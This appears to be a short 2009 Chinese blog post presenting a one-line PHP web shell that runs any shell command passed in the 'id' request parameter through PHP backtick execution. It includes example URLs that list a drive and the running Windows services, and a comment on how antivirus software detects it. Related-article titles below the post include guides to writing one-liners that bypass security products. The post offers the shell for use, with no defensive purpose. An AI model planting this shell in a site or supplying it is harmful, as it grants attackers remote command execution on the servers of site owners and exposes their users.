PHP安全: 一个新型的php一句话cmdshell
2009-06-30 16:46
344 查看
<?php
原理:php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令,
并返回命令执行的结果(string类型);
echo `$_REQUEST[id]`;?>
原理:php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令,
并返回命令执行的结果(string类型);
局限性:特征码比较明显,``符号在php中很少用到,杀毒软件很容易以此为特征码扫描到并警报; ``里面不能执行php代码; 测试方式: http://www.phpv.net/test.php?id=dir%20c 相当于:dir c: http://www.phpv.net/test.php?id=net%20start 查看已启动的WIN服务 .....
相关文章推荐
- PHP安全: 一个新型的php一句话cmdshell
- 一个新型的php一句话cmdshell(非一句话木马)
- php一句话cmdshell新型 (非一句话木马)
- php一句话cmdshell新型 (非一句话木马)
- Nginx + PHP + mysql CGI的一个可能的安全漏洞
- 关于PHP session登录验证的一个安全问题
- 绕过安全狗与360PHP一句话的编写
- PHP javascript 实现将将一句话分解成包含所有单词的一个数组
- Nginx + PHP CGI的一个可能的安全漏洞
- [WEB]绕过安全狗与360PHP一句话的编写
- 一个简单安全的PHP验证码类 附调用方法
- 一个简单安全的PHP验证码类 附调用方法
- Nginx + PHP CGI的一个可能的安全漏洞
- 绕过安全狗与360PHP一句话的编写
- Nginx + PHP CGI的一个可能的安全漏洞(转)
- 用PHP实现一个高效安全的ftp服务器(一)
- 两个房间,其中一间有恶虎,两个守门人一个说真话一个说假话。你只能问一个人一句话,选出安全房间。
- php的一个小特征可能引用发的安全问题
- 一个登陆安全的函数PHP mysql_real_escape_string() 函数
- PHP相关系列 - 某开源php软件的一个安全漏洞所想